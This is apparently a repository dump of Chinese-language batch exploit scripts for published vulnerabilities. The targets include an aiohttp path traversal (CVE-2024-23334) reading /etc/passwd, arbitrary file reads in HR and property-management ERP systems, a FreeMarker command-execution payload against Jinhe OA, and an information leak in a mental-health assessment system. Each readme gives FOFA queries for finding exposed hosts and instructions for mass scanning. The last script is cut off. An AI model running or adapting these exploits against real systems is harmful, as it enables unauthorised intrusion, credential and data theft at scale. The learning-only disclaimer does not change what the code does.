免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="九思软件-OA" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 22 | 23 | ![image-20240202203022822](assets/image-20240202203022822.png) 24 | 25 | ## 入圈(限时体验) 26 | 27 | 28 | 29 | ![image-20240121123620660](assets/image-20240121123620660.png)s 30 | 31 | -------------------------------------------------------------------------------- /20240307iohttp 目录遍历漏洞(CVE-2024-23334)/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240307iohttp 目录遍历漏洞(CVE-2024-23334)/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240307iohttp 目录遍历漏洞(CVE-2024-23334)/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240307iohttp 目录遍历漏洞(CVE-2024-23334)/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240307iohttp 目录遍历漏洞(CVE-2024-23334)/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a iohttp 目录遍历漏洞(CVE-2024-23334)poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/static/../../../../../etc/passwd" 40 | url = target + path 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", 43 | "Connection": "close", 44 | "Accept": "*/*", 45 | "Accept-Language": "en", 46 | "Accept-Encoding": "gzip" 47 | } 48 | 49 | 50 | try: 51 | # conn = http.client.HTTPConnection(target) 52 | # conn.request("POST", path, body.encode("utf-8"), headers) 53 | # response1 = conn.getresponse() 54 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 55 | # print(response1.headers) 56 | 57 | if response1.status_code == 200 and "root" in response1.text: 58 | print(f"[++++++] {target} 存在 目录遍历漏洞") 59 | with open("result.txt", "a+", encoding="utf-8") as f: 60 | f.write(target + "\n") 61 | else: 62 | print(f"[-] {target} 未发现") 63 | 64 | except Exception as e: 65 | print(f"[*] {target} error: {str(e)}") 66 | 67 | 68 | def extract_host(url): 69 | """ 70 | 从 URL 中提取主机地址和端口号,返回 (host, port) 71 | """ 72 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 73 | if match: 74 | prefix, host, port = match.groups() 75 | if not port: 76 | if prefix and "https" in prefix: 77 | port = "443" 78 | else: 79 | port = "80" 80 | return host, int(port) 81 | else: 82 | return None, None 83 | 84 | 85 | def main(): 86 | banner() 87 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 88 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 89 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 90 | args = parser.parse_args() 91 | 92 | if args.url and not args.file: 93 | if "https://" in args.url or "http://" in args.url: 94 | url = args.url 95 | else: 96 | host, port = extract_host(args.url) 97 | url = f"http://{host}:{port}" 98 | poc(url) 99 | 100 | elif args.url is None and args.file is not None: 101 | url_list = [] 102 | with open(args.file, "r", encoding="utf-8") as f: 103 | for url in f.readlines(): 104 | url = url.strip().replace("\n", "") 105 | if "https://" in url or "http://" in url: 106 | url = url 107 | else: 108 | host, port = extract_host(url) 109 | url = f"http://{host}:{port}" 110 | url_list.append(url) 111 | 112 | pool = Pool(10) 113 | pool.map(poc, url_list) 114 | pool.close() 115 | pool.join() 116 | 117 | else: 118 | parser.print_help() 119 | 120 | 121 | if __name__ == '__main__': 122 | main() 123 | -------------------------------------------------------------------------------- /20240307iohttp 目录遍历漏洞(CVE-2024-23334)/readme.md: -------------------------------------------------------------------------------- 1 | # iohttp 目录遍历漏洞(CVE-2024-23334) 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | title=="ComfyUI" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | ## 入圈(限时体验) 26 | 27 | 28 | 29 | ![image-20240121123620660](assets/image-20240121123620660.png)s 30 | 31 | -------------------------------------------------------------------------------- /20240309JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240309JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240309JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)/readme.md: -------------------------------------------------------------------------------- 1 | # JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198) 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | body="Log in to TeamCity" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240310宏景某接口存在任意文件读取漏洞/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240310宏景某接口存在任意文件读取漏洞/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240310宏景某接口存在任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 宏景某接口存在任意文件读取漏洞 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/templates/attestation/../../servlet/DisplayExcelCustomReport" 40 | url = target + path 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 43 | 'Content-Type': 'application/x-www-form-urlencoded' 44 | } 45 | data = { 46 | 'filename': '../webapps/hrms/templates/index/hcmlogon.jsp' 47 | } 48 | 49 | try: 50 | # conn = http.client.HTTPConnection(target) 51 | # conn.request("POST", path, body.encode("utf-8"), headers) 52 | # response1 = conn.getresponse() 53 | response1 = requests.post(url=url, headers=headers, data=data, verify=False, timeout=15) 54 | 55 | 56 | if response1.status_code == 200 : 57 | print(f"[++++++] {target} 存在 任意文件读取") 58 | with open("result.txt", "a+", encoding="utf-8") as f: 59 | f.write(target + "\n") 60 | else: 61 | print(f"[-] {target} 未发现") 62 | 63 | except Exception as e: 64 | print(f"[*] {target} error: {str(e)}") 65 | 66 | 67 | def extract_host(url): 68 | """ 69 | 从 URL 中提取主机地址和端口号,返回 (host, port) 70 | """ 71 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 72 | if match: 73 | prefix, host, port = match.groups() 74 | if not port: 75 | if prefix and "https" in prefix: 76 | port = "443" 77 | else: 78 | port = "80" 79 | return host, int(port) 80 | else: 81 | return None, None 82 | 83 | 84 | def main(): 85 | banner() 86 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 87 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 88 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 89 | args = parser.parse_args() 90 | 91 | if args.url and not args.file: 92 | if "https://" in args.url or "http://" in args.url: 93 | url = args.url 94 | else: 95 | host, port = extract_host(args.url) 96 | url = f"http://{host}:{port}" 97 | poc(url) 98 | 99 | elif args.url is None and args.file is not None: 100 | url_list = [] 101 | with open(args.file, "r", encoding="utf-8") as f: 102 | for url in f.readlines(): 103 | url = url.strip().replace("\n", "") 104 | if "https://" in url or "http://" in url: 105 | url = url 106 | else: 107 | host, port = extract_host(url) 108 | url = f"http://{host}:{port}" 109 | url_list.append(url) 110 | 111 | pool = Pool(10) 112 | pool.map(poc, url_list) 113 | pool.close() 114 | pool.join() 115 | 116 | else: 117 | parser.print_help() 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /20240310宏景某接口存在任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 宏景某接口存在任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="HJSOFT-HCM" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240311weiphp5.0存在远程代码执行漏洞/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240311weiphp5.0存在远程代码执行漏洞/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240311weiphp5.0存在远程代码执行漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # weiphp5.0存在远程代码执行漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240313天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240313天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240313天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config" 40 | url = target + path 41 | headers = { 42 | "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", 43 | "Accept": "*/*", 44 | "Connection": "Keep-Alive" 45 | } 46 | 47 | 48 | 49 | try: 50 | # conn = http.client.HTTPConnection(target) 51 | # conn.request("POST", path, body.encode("utf-8"), headers) 52 | # response1 = conn.getresponse() 53 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 54 | 55 | 56 | if response1.status_code == 200 : 57 | print(f"[++++++] {target} 存在任意文件读取") 58 | with open("result.txt", "a+", encoding="utf-8") as f: 59 | f.write(target + "\n") 60 | else: 61 | print(f"[-] {target} 未发现") 62 | 63 | except Exception as e: 64 | print(f"[*] {target} error: {str(e)}") 65 | 66 | 67 | def extract_host(url): 68 | """ 69 | 从 URL 中提取主机地址和端口号,返回 (host, port) 70 | """ 71 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 72 | if match: 73 | prefix, host, port = match.groups() 74 | if not port: 75 | if prefix and "https" in prefix: 76 | port = "443" 77 | else: 78 | port = "80" 79 | return host, int(port) 80 | else: 81 | return None, None 82 | 83 | 84 | def main(): 85 | banner() 86 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 87 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 88 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 89 | args = parser.parse_args() 90 | 91 | if args.url and not args.file: 92 | if "https://" in args.url or "http://" in args.url: 93 | url = args.url 94 | else: 95 | host, port = extract_host(args.url) 96 | url = f"http://{host}:{port}" 97 | poc(url) 98 | 99 | elif args.url is None and args.file is not None: 100 | url_list = [] 101 | with open(args.file, "r", encoding="utf-8") as f: 102 | for url in f.readlines(): 103 | url = url.strip().replace("\n", "") 104 | if "https://" in url or "http://" in url: 105 | url = url 106 | else: 107 | host, port = extract_host(url) 108 | url = f"http://{host}:{port}" 109 | url_list.append(url) 110 | 111 | pool = Pool(10) 112 | pool.map(poc, url_list) 113 | pool.close() 114 | pool.join() 115 | 116 | else: 117 | parser.print_help() 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /20240313天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | ``` 6 | body="天问物业ERP系统" || body="国家版权局软著登字第1205328号" || body="/HM/M_Main/frame/sso.aspx" 7 | ``` 8 | 9 | 批量poc(记得安装库) 10 | 11 | pip install argparse requests rich 12 | 13 | 14 | 15 | 16 | 17 | python poc.py -u 18 | 19 | python poc.py -f .txt 20 | 21 | 结果保存至result.txt 22 | 23 | 24 | 25 | ![image-20240307092017883](assets/image-20240307092017883.png) 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /20240314金和OA portalwb-con-template-viewcontemplate 远程命令执行/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240314金和OA portalwb-con-template-viewcontemplate 远程命令执行/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240314金和OA portalwb-con-template-viewcontemplate 远程命令执行/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 金和OA portalwb-con-template-viewcontemplate 远程命令执行poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action" 40 | url = target + path 41 | headers = { 42 | "Content-Type": "application/x-www-form-urlencoded" 43 | } 44 | body = "moduId=1&code=${\"freemarker.template.utility.Execute\"?new()(\"xxxxxxxxx\")}&uuid=1" 45 | 46 | 47 | 48 | try: 49 | # conn = http.client.HTTPConnection(target) 50 | # conn.request("POST", path, body.encode("utf-8"), headers) 51 | # response1 = conn.getresponse() 52 | response1 = requests.post(url=url, headers=headers, data=body, verify=False, timeout=15) 53 | 54 | 55 | if response1.status_code == 200 and "xxxxxxxxx" in response1.text: 56 | print(f"[++++++] {target} 存在RCE") 57 | with open("result.txt", "a+", encoding="utf-8") as f: 58 | f.write(target + "\n") 59 | else: 60 | print(f"[-] {target} 未发现") 61 | 62 | except Exception as e: 63 | print(f"[*] {target} error: {str(e)}") 64 | 65 | 66 | def extract_host(url): 67 | """ 68 | 从 URL 中提取主机地址和端口号,返回 (host, port) 69 | """ 70 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 71 | if match: 72 | prefix, host, port = match.groups() 73 | if not port: 74 | if prefix and "https" in prefix: 75 | port = "443" 76 | else: 77 | port = "80" 78 | return host, int(port) 79 | else: 80 | return None, None 81 | 82 | 83 | def main(): 84 | banner() 85 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 86 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 87 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 88 | args = parser.parse_args() 89 | 90 | if args.url and not args.file: 91 | if "https://" in args.url or "http://" in args.url: 92 | url = args.url 93 | else: 94 | host, port = extract_host(args.url) 95 | url = f"http://{host}:{port}" 96 | poc(url) 97 | 98 | elif args.url is None and args.file is not None: 99 | url_list = [] 100 | with open(args.file, "r", encoding="utf-8") as f: 101 | for url in f.readlines(): 102 | url = url.strip().replace("\n", "") 103 | if "https://" in url or "http://" in url: 104 | url = url 105 | else: 106 | host, port = extract_host(url) 107 | url = f"http://{host}:{port}" 108 | url_list.append(url) 109 | 110 | pool = Pool(10) 111 | pool.map(poc, url_list) 112 | pool.close() 113 | pool.join() 114 | 115 | else: 116 | parser.print_help() 117 | 118 | 119 | if __name__ == '__main__': 120 | main() 121 | -------------------------------------------------------------------------------- /20240314金和OA portalwb-con-template-viewcontemplate 远程命令执行/readme.md: -------------------------------------------------------------------------------- 1 | # 金和OA portalwb-con-template-viewcontemplate 远程命令执行 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!!fofa:app="金和网络-金和OA" 4 | 5 | 批量poc(记得安装库) 6 | 7 | pip install argparse requests rich 8 | 9 | 10 | 11 | 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | 20 | 21 | ![image-20240307092017883](assets/image-20240307092017883.png) 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /20240318京师心智心理健康测评系统-存在敏感信息泄露/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240318京师心智心理健康测评系统-存在敏感信息泄露/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240318京师心智心理健康测评系统-存在敏感信息泄露/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 京师心智心理健康测评系统-存在敏感信息泄露 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin" 40 | url = target + path 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0", 43 | } 44 | 45 | 46 | try: 47 | # conn = http.client.HTTPConnection(target) 48 | # conn.request("POST", path, body.encode("utf-8"), headers) 49 | # response1 = conn.getresponse() 50 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 51 | 52 | 53 | if response1.status_code == 200: 54 | print(f"[++++++] {target} 存在敏感信息泄露") 55 | with open("result.txt", "a+", encoding="utf-8") as f: 56 | f.write(target + "\n") 57 | else: 58 | print(f"[-] {target} 未发现") 59 | 60 | except Exception as e: 61 | print(f"[*] {target} error: {str(e)}") 62 | 63 | 64 | def extract_host(url): 65 | """ 66 | 从 URL 中提取主机地址和端口号,返回 (host, port) 67 | """ 68 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 69 | if match: 70 | prefix, host, port = match.groups() 71 | if not port: 72 | if prefix and "https" in prefix: 73 | port = "443" 74 | else: 75 | port = "80" 76 | return host, int(port) 77 | else: 78 | return None, None 79 | 80 | 81 | def main(): 82 | banner() 83 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 84 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 85 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 86 | args = parser.parse_args() 87 | 88 | if args.url and not args.file: 89 | if "https://" in args.url or "http://" in args.url: 90 | url = args.url 91 | else: 92 | host, port = extract_host(args.url) 93 | url = f"http://{host}:{port}" 94 | poc(url) 95 | 96 | elif args.url is None and args.file is not None: 97 | url_list = [] 98 | with open(args.file, "r", encoding="utf-8") as f: 99 | for url in f.readlines(): 100 | url = url.strip().replace("\n", "") 101 | if "https://" in url or "http://" in url: 102 | url = url 103 | else: 104 | host, port = extract_host(url) 105 | url = f"http://{host}:{port}" 106 | url_list.append(url) 107 | 108 | pool = Pool(10) 109 | pool.map(poc, url_list) 110 | pool.close() 111 | pool.join() 112 | 113 | else: 114 | parser.print_help() 115 | 116 | 117 | if __name__ == '__main__': 118 | main() 119 | -------------------------------------------------------------------------------- /20240318京师心智心理健康测评系统-存在敏感信息泄露/readme.md: -------------------------------------------------------------------------------- 1 | # 京师心智心理健康测评系统-存在敏感信息泄露 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa: body="JS/ligerComboBox/ligerTree.js" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240321用友NC runScript接口存在SQL注入-附py/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240321用友NC runScript接口存在SQL注入-附py/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240321用友NC runScript接口存在SQL注入-附py/readme.md: -------------------------------------------------------------------------------- 1 | # 用友NC runScript接口存在SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | body="UClient.dmg"||app="用友-U8-Cloud" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240327某友时空KSOA imagefield接口SQL注入漏洞/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240327某友时空KSOA imagefield接口SQL注入漏洞/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240327某友时空KSOA imagefield接口SQL注入漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 用友时空KSOA imagefield接口SQL注入漏洞 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = 